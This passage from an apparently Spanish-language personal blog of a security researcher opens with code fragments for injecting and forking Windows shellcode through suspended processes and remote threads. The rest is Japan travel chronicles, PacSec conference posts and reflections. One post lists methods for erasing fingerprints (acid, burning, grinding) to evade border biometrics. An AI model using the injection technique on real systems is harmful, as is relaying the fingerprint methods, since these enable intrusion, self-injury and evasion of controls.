v = VirtualAllocEx( pi.hProcess, NULL, 0x5000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory( pi.hProcess, v, buf, sizeof(buf), NULL);

4) Make the thread EIP points to our shellcode

ctx.ContextFlags = CONTEXT_FULL;
ctx.Eip = v;
SetThreadContext( pi.hThread, &ctx);

5) Since the thread is in SUSPENDED MODE, resume execution

ResumeThread(pi.hThread);

The shellcode injected will work perfectly, as far as it does simple things. You will have kernel32.dll and ntdll.dll loaded (but not initialized), so depending what shellcode do you might end up on a crash on non-initialized critical section usage or other similar behaviour.

To fix it, we have to do a couple of tweaks. Let me show you some code:

1) You need to distinguished where you are the forking or the forked process, we did that with a simple self-modifying code:

forkentry:
// if this marker is cleared this jmps to forkthis:
// we copy this entire payload over ;)
xorl %eax, %eax
incl %eax
test %eax,%eax
jz forkthis

// start of self modifying muck

// Self modifying code, change the incl for a nop
leal forkentry-getpcloc(%ebp),%ecx
movb $0x90, 2(%ecx) // 2(%ecx) points to the incl %eax

2) CreateProcess in suspended-mode

CreateProcess(NULL, "cmd", NULL, NULL, 0, CREATE_SUSPENDED, NULL, &si, π);

3) Remote VirtualAllocate and Write our shellcode there.

v = VirtualAllocEx( pi.hProcess, NULL, 0x5000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory( pi.hProcess, v, buf, sizeof(buf), NULL);

4) Get Full context of the main thread

ctx.ContextFlags = CONTEXT_FULL;
GetThreadContext( pi.Thread, &ctx);

5) Create a Remote Thread and run it

CreateRemoteThread( hProcess, 0, 0, shellcode, 0, 0,0)

6) Resume the main thread execution of the main thread.

// pi.hThread
pushl %esi
call RESUMETHREAD-getpcloc(%ebp)

7a) If you are forking, exitthread

xorl %eax,%eax
pushl %eax
call EXITTHREAD-getpcloc(%ebp)

7b) If you are forked, sleep for one second to let the main thread initialize everything

kernel32.dll!Sleep( 0x1000)

And that takes around 0x2cd bytes (It can be optimized), including:
- LoadLibrary("WS2_32.dll")
- Resolving WS2_32.dll!wsastartup and calling it
- and including the first-stage mosdef shellcode (socket/connect/recv).

All the kudos for Bas and his recently re-write of our shellcode framework making this smoother experience.

Reflexión o Barbarie

2008-06-30T16:12:00.000-07:00

Dice sabiamente Ricoeur:
"La guerra es y sigue siendo a nuestros ojos, ese cataclismo, esa irrupción del caos, ese retorno a la lucha por la vida en las relaciones externas de Estado con Estado. Esta sinrazón histórica tiene que seguir siendo injustificada e injustificable; el acontecimiento que consagra la separación completa de la caridad y de la violencia, al hacer saltar el vínculo frágil - la prohibición del homicidio - que las mantenía juntas, no puede ser objeto de una deducción moral."

Paul Ricoeur en Historia y Verdad, habla de dos éticas bien distintas en el hombre analizado a través del cristianismo.
La primera, el agapé cristiano, es decir la ética del amor al projimo, del "amaros los unos a los otros", que es tambien la etica de la caridad, la de poner la otra mejilla. Esta etica propone una forma sacrifical del amor, al no haber una resistencia ante una violencia.
La segunda etica, la pone en manifiesto San Pablo en el capitulo XIII de la Carta a los Romanos, cuando introduce la figura del magistrado "Cada uno en esta vida debe someterse a las autoridades. Pues no hay autoridad que no venga de Dios, y los cargos públicos existen por voluntad de Dios.". Ricoeur dice que aqui Pablo rompe con la invitación al amor mutuo y traza esta figura de autoridad la cual castiga al que obra mal.
Y ahí la ruptura entre las dos eticas, la del sacrificio que devuelve bien por mal y la del Estado coactivo, que devuelve mal por mal.
Pero hay un unico e indicustible limite entre las dos que las puede matener juntas, la prohibición del homicido "no mataras". Ese es el limite del Estado, el respeto a la persona en su vida y su dignidad.

Hace pocos días, tuve la oportunidad de visitar el Museo Aeroespacial Steven F. Udvar-Hazy, donde tenian en exposición el Enola Gay, el infame Boeing B-29 que en 1945 lanzó la primera bomba atomica que explotó en la ciudad de Hiroshima, en Japon.
Cuando el fuselaje del mismo fue expuesto en un museo de similar caracteristicas, surgieron muchas controversias, pero al contrario de las que se le hubieran suscitado a cualquier hombre de templanza, mas bien relacionadas con un conflicto interior etico, las protestas estuvieron dirigidas a que la muestra enfatizaba los resultados nefastos de la bomba atomica en lugar de las motivaciones y el rol que cumplió la bomba para terminar la segunda guerra mundial.

Museo Aeroespacial Steven F. Udvar-Hazy

Museo de la Paz (Hiroshima, JAPON)

¿Qué hacemos Juan Carlos?

2008-06-23T16:56:00.000-07:00

Liniers - La Nacion, 18 de Junio

Encargue su DVD ya!

2008-06-03T16:32:00.000-07:00

Mientras escribo estas palabras, el iDVD de la minimac está abriendo todas sus bastas y pequeñas puertas lógicas para renderear la version cinematográfica de las bitacoras de Japon.
Aproxidamante son 45 misteriosos, excitantes, atrapantes y desafiantes minutos del video que casi de soslayo grabamos en aquellas entrañables tierras remotas.

Los capitulos estan divididos en Shibuya (Tokyo), Cruce de Shibuya, Akihabara, Takayama y Ryokan Asunaro. Los lectores mas lúcidos de las crónicas escritas notaran la falta de muchos otros lugares, pero el ojo electrónico de la mini-dv solo se encendió en contadas oportunidades.
Pero a no alarmarse, que las aventuras siguen ahí, tan vigente como en las páginas de este blog.

A disfrutar!

Un momento de lucidez

2008-02-18T04:10:00.000-08:00

Los que pueden... se corren del monitor, enderazan la comisura de los labios y la mirada, como aquellos senderos bifurcados de Borges, lentamente se les pierde en la finitud del paisaje urbano. La reflexion es inminente...

Sabian que ya hay generaciones mayores de 18, nacidas durante la presidencia de Carlos S. Menem?

Antidepresivos en la Epica

2008-01-12T13:46:00.000-08:00

"Entonces, Helena, nacida de Zeus, pensó otra cosa: al pronto echó en el vino del que bebían una droga para disipar el dolor y aplacadora de la cólera que hacía echar a olvido todos los males. Quien la tomara después de mezclada en la crátera, no derramaría lágrimas por las mejillas durante un día, ni aunque hubieran muerto su padre y su madre o mataran ante sus ojos con el bronce a su hermano o a su hijo. Tales drogas ingeniosas tenía la hija de Zeus, y excelentes, las que le había dado Polidamna, esposa de Ton, la egipcia, cuya fértil tierra produce muchísimas drogas, y despues de mezclarlas muchas son buenas y muchas perniciosas; y allí cada uno es médico que sobresale sobre todos los hombres, pues es vástago de Peón. Así pues, luego que echó la droga ordenó que se escanciara vino de nuevo; [...]"

Odisea, Homero. Canto IV. Párrafo 219.

De Homero, sobre el vino

2008-01-11T08:35:00.000-08:00

"Te trastorna el vino, dulce como la miel, el que daña a quien lo arrebata con avidez y no lo bebe comedidamente"

Borrarse las Huellas Dactilares

2008-01-06T18:33:00.000-08:00

Dentro de las ponencias de PacSec, se destacan los lighting talk, que son charlas de 10 a 15 minutos mostrando algo muy puntual.
Una de las charlas que llamo mas la atencion, fue la del Canadiense "mock" un habitue del staff de organizadores, en la cual utilizaba distintas tecnicas masoquistas para borrar sus huellas.
Entre ellas uso:

Cyanoacrylate: Tambien conocida como "la gotita"
Piedra para callos (y mucha paciencia)
Usando un dremel
Acido
Quemandose: Utilizo una plancha para bifes
Congelando con propano comprimido

Todo este dolor, fue en el contexto de una nueva modificacion en los controles aduaneros de Japon, en la cual todos los extranjeros tienen que dejar sus huellas digitales y una foto para ingresar al pais.
El logro su cometido, al entrar simplemente llenando un formulario (Luego de varios intentos fallidos de digitalizar las quemaduras). La excusa utilizada fue supuesto accidente que le ocurrio esquiando cuando sus dedos se le quedaron pegado a un hierro congelado.
Segun lo que me conto, no fue ni el primero ni el ultimo en entrar al Japon sin digitalizacion, ya que aparentemente a los ancianos se les suele perder el dibujo de las huellas con el tiempo.

Para los morbosos, aqui pueden encontrar un pdf con las slides.

Todos con el Sanfre !

2007-12-12T04:47:00.001-08:00

Sanfrecce F.C. en directo, en las calles de Hiroshima

Cronicas Nipponas - 12vo Capitulo "El regreso"

2007-12-11T20:19:00.000-08:00

Lamentable y afortunadamente cuando uno husmea otras culturas no puede
dejar de caer en comparaciones desbaratadoras, que vulneran los
propios sentidos.

Tuvimos la gran oportunidad de conocer una cultura lejana para
nosotros, tanto geograficamente como en conocimiento y consideracion,
como es Japon.

Sin idealizar ni profundizar mucho, lo que resalta a simple vista es
una extendida internalizacion de la norma, esto es la ley: respetar,
mantener limpia la ciudad, no hablar por celular en los
trenes y subtes simplemente para no molestar a los demas.

Tambien se destaca el enorme desarrollo economico y tecnologico. Y aqui viene una gran
cuestion de comparacion: Japon es un pais minusculo con 127 millones de
habitantes, alrededor de 337 de personas y media por kilometro cuadrado frente a los 14
que somos nosotros. Y con menores "recursos naturales" a disposicion que nosotros.

Pero en que consisten los recursos, en aquellos dones dados por la
sabia naturaleza o en la capacidad de razonar para poder utilizarlos
en propio bienestar y provecho.

De que sirven enormes recursos naturales si los "otros recursos" no existen o estan
en decadencia. La respuesta es obvia, los recursos estan
en la mente, y eso es inteligencia.

Hiroshima despues de aproximadamente 50 anos de un devastamiento nuclear se recupera y es
hoy lo que es, Argentina despues de 50 anos desde la misma fecha en
que cayo en la bomba -Epoca en que nosotros eramos conocidos por el granero del mundo-,
se encuentra en uno de sus peores momentos en cuanto a indices de pobreza y violencia.

Que paso con la abundancia de recursos? Ah cierto, no se bastaban por si solos, no se
trataba sencillamente de generacion espontanea?

Habia que hacer algo con ellos. Si algo!. Trabajar. Para programar a largo plazo, planificar,
cumplir objetivos, imponer una ley justa, educar, perseverar y
volver a perseverar, lograr una base sustentable y continua a partir de donde
despegar.

Pero no hacemos mas que derrumbar las bases y flotamos a la
deriva, esperando que solo el viento nos devuelva, despues de cada
tormenta, a un lugar seguro. Sabemos lo que paso y lo que esta
pasando.

En Argentina por el contrario lo que se ve a cada instante, desde que bajas del avion
y pones pies en tierra "firme", una constante transgresion a la norma, y un elogio permanente de la misma
permanente.

Somos muy vivos y despues nos reimos socarronamente
de los demas: el ponja, el chino etc.

Y nosotros? Donde estamos? Nos reimos de nosotros mismos tan socarronamente?

Los periodistas que cubren el partido de Boca, se asombran porque en Japon se pueden ver personas por la calle con
dos celulares. Me importa poco si son 2 o 3, La realidad es que quien tiene 2 celulares puede y el que puede, no deja de comer y
consume.
La tecnologia no esta solo en los aparatos electronicos para consumo individual sino que se plasma en un bien
social como los transportes publicos.
Como decia, me importa poco si usan por demas tecnologia, pues la tienen, nosotros no la tenemos,
no la valoramos, no la desarrollamos, no podemos hablar. El exceso es
un problema aparte importante, pero mas grave es la escasez: De
recursos sociales, no de individualidades geniales.

Cristina, el modelo industrial era valido quizas en el '45, ahora se requiere una mayor inversion cientifico, tecnoligica y cultural.

Hasta pronto.

Otra mas de la conferencia...

2007-12-11T09:10:00.001-08:00

Esta es una foto panoramica de la conferencia durante mi charla.

Las aberraciones del angular en los extremos, da la sensacion que era un salon chico, pero facilmente debia tener alrededor de 50 metros de ancho y la mitad de largo.

Kudos a Hirosan por la foto.

Rock and Roll carajo!

2007-12-11T06:18:00.000-08:00

Lo que pueden ver en el video, es un pequeno fragmento de una ceremonia budista en el templo Daisho-In.

Disfruten

Ceremonia de Casamiento en Japon

2007-12-11T05:48:00.000-08:00

Casi de casualidad, recorriendo el templo Itsukushima el templo principal de la isla de Miyajima a pocos kilometros de Hiroshima tuvimos la suerte de presenciar un casamiento tradicional Japones, aca el video (La flauta suena desafinada, culpen el rudimentario microfono de la camara)

Que pinta papa!

2007-12-11T03:45:00.000-08:00

En el contexto de PacSec 2007, en Tokyo Japon.

Dragos anunciando mi charla, antes de comenzar

Primer diapositiva, traducida al Japones (Lindo, no?)

Les recuerdo, que fue la ultima charla del ultimo dia, asi que era inevitable agregarle algo de humor para mantener a un publico exahusto.

En medio del fragor de la batalla

Una larga historia

Preguntas?

La disertacion salio moderadamente bien, algunos problemas tecnicos al comenzar. En mi notebook no podia ver las diapositivas por lo que ayudo un poco a los nervios, pero una vez que ya embarrado en la cancha, uno se tranquiliza y larga todo lo que sabe.

Otro problema importante (que esperemos que dragos y los organizadores encuentren una forma de cambiarlo en el futuro) se encuentra en que las presentaciones traducidas al espaniol estan en otra notebook, por la que uno, enfrentado al publico, tiene que andar tecleando 'next' en las dos computadoras. Triple desafio: Presentar la informacion correctamente, coordinacion cerebro-dedo y utilizar un ingles correcto.

Pero todo salio bien, saque algunas sonrisas (uno de los objetivos mas complicados, frente a un publico nipon) y tuve alguna que otra pregunta.

Se le agradece a Cedric Blancer (http://sid.rstack.org) por el material fotografico.

Cronicas Nipponas - 9to Capitulo - "Hitler era muy Zen"

2007-12-03T14:06:00.001-08:00

Estimados lectores,
Luego de un largo intervalo de silencio, volvemos al ruedo en nuestras cronicas de viajeros por el interior del Japon.
En este caso, en la hermosa ciudad de Kyoto, conocida por su gran numero de templos y por ser la antigua capital de Japon. Su belleza fue la consideracion por la cual Estados Unidos opto por no tirar la bomba alla en la segunda guerra mundial.
Kyoto esta localizada en un valle, rodeado de 3 montanias Higashiyama, Kitayama y Nishiyama.

Si en algun momento, a nuestros lectores se le ocurrio que el sistema de trenes de Tokyo era complicado fue por que todavia no leyo en nuestras cronicas, sobre el sistema de colectivos de Kyoto. Si bien es una ciudad chica, con aproximadamente 1.5 millones de personas (y todas visitan juntan los templos los fines de semana) tiene alrededor de 29 lineas de colectivo que cubren la totalidad de la ciudad. Viajar en colectivo es una peculiar experiencia, se entra por la puerta trasera y se sale por la delante, se paga siempre al final del viaje, el conductor no grita, usa guantes y un microfono con el que indica las paradas (Al margen de las pantallas). Lo que no se evita, es viajar en forma sardinesca, caracteristica mundial de los colectivos citadinos, la unica diferencia es que los japoneses rompen record de persona por centimetro cuadrado (Ya lo dijo buda "Donde entran 1, entran 20").

Por motivos de tiempo (ya estamos partiendo para Hiroshima), no voy a describir los templos, pero si les dejo algunas fotos para que disfruten. Miren atentamente la variedad de colores que van del amarillo al bordeaux en el follaje de los cerezos que es especialmente hermosa.
http://picasaweb.google.com/nicowow/02122007

Para los que estaban preocupado por el tema (posiblemente solo Cari y Nico), ya pudimos comprar una valija adecuada (Notese que todas las valijas sencillas que habiamos encontrado hasta al momento estaban alrededor de los 1500 usd, si, Japon es caro, especialmente los shoppings). Pero ya estamos en camino, con valija nueva, valija chica, y la vieja, que la llevamos al hombro.

Mas novedades desde Hiroshima!

Hasta pronto

Cari & Nico

Cronicas Nipponas - 8to Capitulo - "Reforzando las ruedas"

2007-12-01T11:55:00.001-08:00

Sean todos bienvenidos nuevamente a este humilde diario de viajero,

Es muy importante, a la hora de viajar a Japon tener en cuenta dos o tres hechos de los cuales por mas que se intente, no se va a poder escapar.
En Japon se camina. No importa cuantos yenes uno tenga en el bolsillo, uno va a tener que transladarse dentro de los subtes, trenes, en el aeropuerto, por las calles, en un templo, por ende, siempre es recomendable ir lo mas lijero de equipaje de mano y en cuanto al equipaje grande, bueno, intenten buscar la mejor valija posible por tamanio y durabilidad.

Ese fue el caso de estos viajeros, que compraron especificamente una valija del tamanio mas grande (Sabiendo que se llenaria con algunos artilujios) y con 4 ruedas, asi facilita su movimiento (Pese a que cuidadosamete, se contrato hoteles cercanos a las estaciones de subte). Pero todo eso fue en vano, ya que solo en el primer tramo Hotel de Tokyo hasta Shibuya, se perdio la primer rueda de la valija grande.
Pero ello no vencio a estos aventureros, y con un poco de creatividad argentina lograron llegar a la estacion con 3 ruedas. De Shibuya se tomaron el subte a la estacion Tokyo, y alli el famoso Shinkansen (Tren Bala).
El Tren Bala Japones es una muestra de la alta tecnologia de este pais. Recorre alrededor de 2000 kilometros (o mas) desde el extremo norte al sur. En nuestro caso, nos tomamos el Shinkansen Hikari que comienza en Tokyo y tiene como destino Kyoto, haciendo algunas paradas intermedias como Nagoya, etc y entre los paisajes que recorre se encuentra el famoso Monte Fuji y el estadio Ark Theatre Sanyo (Que posee la mayor cantidad de paneles solares del mundo). Les recuerdo, que como todo en japon, tiene una precision kilometrico y salio y llego en horario.

Llegados a Kyoto, solo quedaba caminar unas dos cuadras (Segun el mapita que indicaba nuestro hotel), que se convirtieron en alrededor de 8 dado la longitud de las calles. Y en ese tramo, como era de esperar se perdio la segunda rueda. De ahi en mas, fue todo dolor y callos hasta llegar finalmente al Kyoto Tokyu Hotel.
Un hermoso hotel en el norte de Tokyo el cual nos encontramos en este momento escribiendo estas cronicas.

Al lado del hotel y extrensamente recorrido por sus servidores, se encuentra el templo Nishi-Hongaji ("Hongaji del Oeste"). Este templo es la cabeza del ala Hongaji de la secta budista Jodo-Shinshu (Notese que 'secta' no tiene el nombre despectivo que se utiliza en Argentina, es simplemente religion) con millones de seguidores alrededor del mundo. (Aunque ninguno de ellos, tenia una rueda extra para prestarnos).
Este templo fue construido en 1591 por Toyotomi Hideoshi (un general bastante combativo de esa epoca) luego que otro templo de similares caracteristicas fuera destruido en Osaka por su enemigo Oda Nobunaga. Este hermoso templo fue designado por la UNESCO como "Patromonio mundial"

Para los sedientos de fotografias, aqui pueden ver algunas:

http://picasaweb.google.com/nicowow/01122007Kyoto1stDay

Hasta pronto
Cari & Nico

Cronicas Nipponas - 7to Capitulo - "Recapitulando Restaurantes"

2007-11-30T15:07:00.001-08:00

Estimados lectores,
Nuevamente nos encontramos aqui, en visperas del viaje a Kyoto, en una de las tantas hermosas nubladas manianas que el imperio del sol naciente nos ofrece.
En esta edicion, gracias a nuevos elementos tecnicos pudimos subir el material fotografico de la camara que denominaremos "Camara C" (Es decir, la camara que lleva siempre Cari).

Conociendo ya, los manjares a los que se presenta el turista frecuente de avion (Ensaladas con un condimento de rara precedencia, Pasta recalentada, Pollo seco con verduras pasadas de hervor, etc), el viaje de Washington a Tokyo nos sorprendio con un menu de mediodia que consistia en una serie de verduras con pollo al gengibre, arroz, una serie de quesos y rabanos a la vinagreta y unos interesantes fideos frios.
http://picasaweb.google.com/nicowow/CamaraCariFrom2629November2007/photo#5138740634177427634

Como se describio detalladamente en el primer capitulo de esta aventura, el primer encuento Argentino-Japones se realizo en una local de 'yakiniku' (parrilada a la Japonesa), aqui se puede apreciar el documento fotografico que lo prueba:
http://picasaweb.google.com/nicowow/CamaraCariFrom2629November2007/photo#5138740664242198786

Otros de los manjares que este equipo tuvo la suerte de deleitar, fueron distintas variades de Niguiri ( Arroz con una tira rectangular de pescado crudo/cocido por arriba).
http://picasaweb.google.com/nicowow/CamaraCariFrom2629November2007/photo#5138740711486839138
http://picasaweb.google.com/nicowow/CamaraCariFrom2629November2007/photo#5138740715781806450
No describiremos con precision cada uno, pero entre ellos habia toda clase de salmon y atunes, huevos de salmon, anguilas varias y un niguiri desconocido para nosotros, que consistia en higado de pez sapo (Es decir, una suerte de Foie Grass Japones).
Tambien, dentra de la gama del sushi, visitamos el restaurant que tenia la cinta automatica que trasladaba platos:
http://picasaweb.google.com/nicowow/CamaraCariFrom2629November2007/photo#5138741647789709746

Para los que estan interesados en conocer las entranias del Bank Of Japan y el equipo de trabajo de XBRML (incluyendo a nuestra especialista en economia), solo tienen que clickear en el siguiente link:
http://picasaweb.google.com/nicowow/CamaraCariFrom2629November2007/photo#5138741673559513586

Finalmente, les dejamos dos fotos de la conferencia (prometemos mas), donde se puede ver en la primera un grupo de franceses que vinieron a presentar sobre temas varios, y la segunda a "Kostya", un companiero de trabajo de Nico, Frances tambien, ofreciendo Abrazos gratis.
http://picasaweb.google.com/nicowow/CamaraCariFrom2629November2007/photo#5138743425906170786
http://picasaweb.google.com/nicowow/CamaraCariFrom2629November2007/photo#5138743430201138098

Hasta la proxima!
Cari & Nico
PD: Si quieren ver mas fotos, dirigirse a: http://picasaweb.google.com/nicowow/CamaraCariFrom2629November2007

FREE HUGS

2007-11-30T12:52:00.000-08:00

Se ofrecen

Cronicas Nipponas - 5to Capitulo - "En busca del pescado crudo"

2007-11-29T09:58:00.001-08:00

Con el transcurso de los dias, los miembros de la expedicion lentamente van aumentando sus habilidades para comprender, comunicarse y transladarse. En esta ocasion, y con motivo del insomnio post jet-lag, el equipo se dirigio a las 5 am, para el famoso mercado de pescado Tsukiji. Para ello, se tomaron la Yamamote Line de los JR (Japanese Rail) con direccion Omotesando, y se bajaron en la estacion Ebisu. Ahi, hicieron combinacion con la Hibiya Line para que, luego de 10 estaciones y 20 minutos, arrivaran a la estacion Tsukiji.
-------------------
Cara de 5am: http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138061495429410082
Hibiya Line: http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138061508314312034
Japoneses invadidos por la publicidad dentro de los subtes: http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138061525494181250
-------------------

El mercado tsukiji data del siglo 16, periodo Edo, en donde el shogun de Tokyo invito a varios pescadores a pescar cerca del castillo para proveer de alimento al castillo. En la actualidad, el mercado maneja alrededor de 2882 toneladas de pescado por dia (El dia de ayer, fueron 2882 menos medio kilo, que fueron los sushi que Cari y Nico desgustaron solo con el objetivo de complicar las estadisticas).
Una de las mas impresionantes caracteristicas de este mercado, aunque suene inversomil, es que no tiene absolumentamete olor a pescado. Si bien, por ejemplo, si uno pasa por un negocio de pescado seco, siente temporalmente ese olor especifico - para ubicarse olfativamente, el olor se asemeja al de los frascos amarillos de escamas que se le dan a los peces de pescera- pero en las demas stands donde se vende pescado crudo no hay absolutamente ningun tipo de olor, lo cual le da una caracteristica unica.
Aparte de vender pescado crudo, tambien hay todo tipo de verduras, rabanos -recuerden que los japoneses consumen mucho este tipo de vegetal-, te y toda clase de utencillos para la cocina de los restaurantes.
-----------------
Pescado sin olor, prueben acercar la nariz al monitor y comprobaran la veracidad: http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138061538379083170
Semillas de Poroto Azuky: http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138061559853919714
Frasquitos para la salsa de soja: http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138061581328756274
Rabanos: http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138061589918690898
No se hagan los vivos con los pescadores: http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138061632868364034
Pescada: http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138061658638167858
Como tenia que ser, desayunamos unas piezas de sushi para comenzar el dia con todo: http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138061602803592850
-----------------
Luego de incrementar el numero de callos en los pies, el equipo se dirigio al districto de Aoyama (estacion Omotesando de la linea Ginza), este barrio es la version Japonesa de "Beverly Hills", es decir, un barrio en donde es mejor esconder la billetera (Para entender lo de "version japonesa", multipliquen por dos el precio que tienen en su cabeza).
En este barrio, especificamente en el Aoyama Diamond Hall Hotel, es donde se realiza la conferencia titulada PacSec y la razon secundaria por la que nos encontramos aqui en Japon.
Permitan que abramos parentesis para contarles que el Trainning que estaba pactado para el 27 o 28 de Noviembre se cancelo (Por lo que permitio al equipo recorrer mas Tokyo de lo esperado), de cualquier manera todavia queda la conferencia de una hora que se dara maniana a ultima hora.
-----------------
Conferencia: http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138202039644237794
Traductores en simultaneo: http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138202052529139714
Cholula: http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138202061119074338
-----------------
Luego de eso, nos dirigimos a la Meiji Shrine a pocas cuadras de donde nos encontraramos.
El templo Meiji, fue construido en 1920 y reconstruido luego despues de la segunda guerra mundial (Notese que la guerra con Estados Unidos no solo fueron Hiroshima y Nagasaki, sino casi todo el territorio japones fue bombardeado y con ello, muchos del patrimonio cultural).
Este templo fue construido en honor al emperador Meiji que fue el encargado de "Occidentalizar Japon" (O abrirle las puertas a occidente, para hacerlo mas claro). Por ejemplo, una de las leyes que realizo fue la de prohibir el uso de katanas (espada japonesa) en las calles.
Si bien, no es uno de los mejores templos (en Kyoto nos esperan muchos mejores), es muy lindo e interesante visitarlo.
-----------------
Las estructuras de madera, anuncian la cercania del templo: http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138202099773780082
Tarros de Sake? en la entrada: http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138202151313387746
Antes de entrar, a purificarse: http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138202194263060818

http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138202202852995442
El templo: http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138202284457374322
http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138202293047308930
Para pedir deseos, hay que largar algunos yenes: http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138202262982537762
Deseos: http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138202250097635826
Por dentro: http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138202275867439698
-----------------
Esto es todo por hoy, maniana posiblemente no visitemos mucho debido a que nos espera un dia de conferencia!

Hasta pronto
Cari y Nico

Cronicas Nipponas - 4to Capitulo

2007-11-28T12:22:00.000-08:00

Konichiwa desde el imperio del sol,
Uno de los problemas mas importantes que afronta nuestro equipo es la comunicacion verbal y gestual con los nativos. Si bien, problemas de comunicacion en el lenguaje eran esperados pese al entrenamiento previo en la lengua anglosajona por excelencia, lo que llamo la atencion de nuestros aventureros fue el lenguaje gestual.
Como se imaginaran, ni "Si" ni "Yes" funcionan para afirmar, tampoco se puede asentir, conociendo ya que ese gesto es reservado para la famosa reverencia japonesas. (Hasta el dia de la fecha, el equipo no ha ubicado el gesto adecuado, hay una suerte de paso clasico de danza moderna, en el cual uno pone las manos sobre la cabeza, pero no esta verificado en la practica).
Como ocurre con "Si", la palabra "No" tampoco funciona en japones -Se dice Lee-, y como ya a esta altura se habran imaginado, mover la cabeza de lado a lado tampoco funciona. Lo que si funciona, es hacer una cruz con los dedos (o los brazos, si quiere ponerse mas enfasis) e inclinarla unos 45 grados, como lo indica la siguiente fotografia donde un japones nos advierte amablemente que no lo fotografiemos. (La senia, hecha con los dedos y en el contexto de un restaurant, sirve tambien para pedir la temida cuenta despues de saborear algun manjar).

Para ustedes lectores, que insistieron en ver fotografias de los expedicionarios, les dejamos una:
http://picasaweb.google.com/nicowow/28112007/photo#5137985075076312098 que en vez de Wally, el juego se llama "Busca a Cari".

Hasta pronto !

Nico & Cari

Cronicas Nipponas - 3er Capitulo - "Cari va al Central"

2007-11-28T07:39:00.000-08:00

Konichiwa queridos seguidores,
El capitulo de hoy se llama "Cari va al central". No se asusten, no es la rutina diaria sino el trayecto que realizo la miembro del equipo femenino para llegar al BOJ (Bank of Japan, el Banco central de Japon), en donde tenia un intercambio estudiantil, perdon, cultural con un miembro de la institucion.

Empecemos por el principio, la red de subtes es bastante sencilla.

Aproximadamente, Tokyo tiene unas 35 lineas de subte y algunas mas de tren, que como dijimos en el capitulo 2, poco se diferencian de los subtes. Pero, aunque parezca estadisticamente imposible, manejarse en los subtes de Japon es bastante sencillo, y para ello, el equipo de investigacion forense dedico al maniana de hoy a investigarlo, a continuacion les presentaremos el case-of-study.

El objetivo de la expedicion era llegar, sanos y salvos a la estacion Mitsukoshimae que se encontraba a dos cuadras del ya renombrado Bank of Japan donde Cari tendria un arduo dia de trabajo. Para ello, primero nos aventuramos a la estacion de Shibuya de subte, y escogimos entre las distintas lineas de subte posible, la "Ginza Line". El sistema es muy sencillo, y funciona con precision milimetrica, una vez que uno sabe la linea y la estacion, primero tiene que sacar el boleto , si uno no posee las tarjetas magicas recargables (SUICAS), tiene que ir a la expendedora automatica y sacar un ticket , el precio depende de la estacion a la que vaya, se recomienda preguntar en alguna casilla el precio adecuado.
Ya con ticket, el sistema es muy simple. Hay dos posibilidades en una misma linea, ir para un lado o para otro (teniendo en cuenta, que los trenes tiene una estructura lineal), por lo que uno debe buscar cual estacion famosa esta para el lado que uno quiere ir, en este caso Ueno era la mas famosa, por lo que se escogio los subtes que 'van para Ueno'

Lo demas es facil, simplemente subirse al subte y fijarse exactamente en que estacion bajarse

El sistema es preciso y efectivo, olvidense de los piquetes en Carapachay. Como el caso lo demuestra, la excursion fue un exito, tanto de ida como de vuelta.
Si todavia tienen dudas, este solidario mapache les explicara algunos detalles:

Mientras Cari representaba a nuestra querida republica K, el resto de la expedicion se adentraron en el barrio centrico de Nihombashi -famoso por su puente, y por ser nuestro restaurant japones preferido en capital federal- y el barrio de Shinjuku (uno de los tantos barrios lleno de luces, colores, bares del Tokyo moderno).

Una de las actividades en donde el grupo de etnologos ponen mas enfasis, es en las famosas artes culinarias de japon, este sera un tema recurrente en los distintos capitulos de esta cronica. En esta edicion vamos a poner enfasis en dos modalidades distintas: La expendedora de ticket de comida y el restaurant-mostrador de comida.

La expendedora de ticket de comida, nombre un tanto largo per descriptivo, son restaurantes en donde en la entrada tienen como una maquina expendedora en la cual uno escoge que comida quiere, paga y esto le entrega un ticket. Una vez terminado el simple proceso, uno ingresa al recinto y se lo entrega al cocinero sin mas interaccion, el cual luego de cocinado, le entrega el plato deseado. Recomendado para japoneses en apuros o Gaijines (Extranjeros) cansados de lidear con los problemas de traduccion.

Los restaurant-mostrador, son aquellos templos culinarios que en la entrada tienen una vidriera con la mayoria de los platos del menu armados en plastico, por lo que los ignorantes extranjeros o los japoneses que gustan 'devorar con los ojos' pueden utilizarlo como un incentivo interesante a la hora de su eleccion.

Esto es todo por la edicion de hoy, el equipo esta documentando minuciosamente los estereotipos de Japoneses y promete una investigacion profunda sobre el tema en una futura edicion.

Hasta la proxima
Cari & Nico

Cronicas de Tokyo - 2da Parte

2007-11-27T08:16:00.000-08:00

Henos aqui nuevamente desde nuestro humilde rincon, para documentar minuciosamente las distintas experiencias en Tokyo.
Por la maniana, el grupo de aventureros se adentro por las entranias mismas del barrio de Shibuya, barrio conocido por ser frecuentado por jovenes - como quienes les escriben- y tener multiplicidad de shopping y negocios - gran tentacion, para el miembro femenino de la expedicion-.
Como se puede apreciar en la siguiente foto la travesia estuvo documentada con material fotografico y filmico, principalmente algunos momentos cruciales como el ya conocido cruce de Shibuya y algunas esquinas.

La temperatura fue bastante baja, por lo que en aprovechando las cualidades del barrio, se decidio a comprar el equipamento necesario para la travesia. Esta experiencia, al parte de provechosa dejo unas cuantas reflexiones.

